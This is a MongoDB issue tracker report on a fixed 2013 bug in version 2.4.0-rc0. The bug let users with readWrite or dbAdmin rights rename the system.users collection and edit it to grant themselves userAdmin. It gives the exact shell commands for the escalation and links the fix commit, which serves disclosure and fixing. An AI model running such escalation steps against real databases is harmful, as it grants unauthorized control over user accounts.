[SERVER-8623] Unauthorized users are allowed to rename to and from system.users Created: 19/Feb/13  Updated: 11/Jul/16  Resolved: 20/Feb/13

Status: Closed
Project: Core Server
Component/s: Security
Affects Version/s: 2.4.0-rc0
Fix Version/s: 2.4.0-rc1

Type: Bug Priority: Major - P3
Reporter: Andrew Emil (Inactive) Assignee: Spencer Brody (Inactive)
Resolution: Done Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified

Issue Links:
Related
Operating System: ALL
Steps To Reproduce:

>db.auth('hacker', 'hack') //assume you have readWrite and dbAdmin rights
>db.system.users.renameCollection('users')
>db.users.update(

{ user : 'hacker' }

, { $set : { roles : ['userAdmin']}})
>db.users.renameCollection('system.users')
>db.auth('hacker', 'hack') //now you have userAdmin rights

Participants:

 Description   

A user with dbAdmin access is allowed to rename the system.users collection. They are also allowed to rename any collection to system.users (if there is not currently a collection there). This makes it possible to change user permissions without having userAdmin rights.



 Comments   
Comment by auto [ 20/Feb/13 ]

Author:

{u'date': u'2013-02-20T15:22:35Z', u'name': u'Spencer T Brody', u'email': u'spencer@10gen.com'}

Message: SERVER-8623 Don't allow renameCollection to bypass auth checks on system namespaces
Branch: master
https://github.com/mongodb/mongo/commit/097e3578da6365b20d41d74bfe13d414c151eda7

Comment by Andrew Emil (Inactive) [ 20/Feb/13 ]

Just as an update: don't need dbAdmin rights here, just readWrite

Generated at Thu Feb 08 03:17:56 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.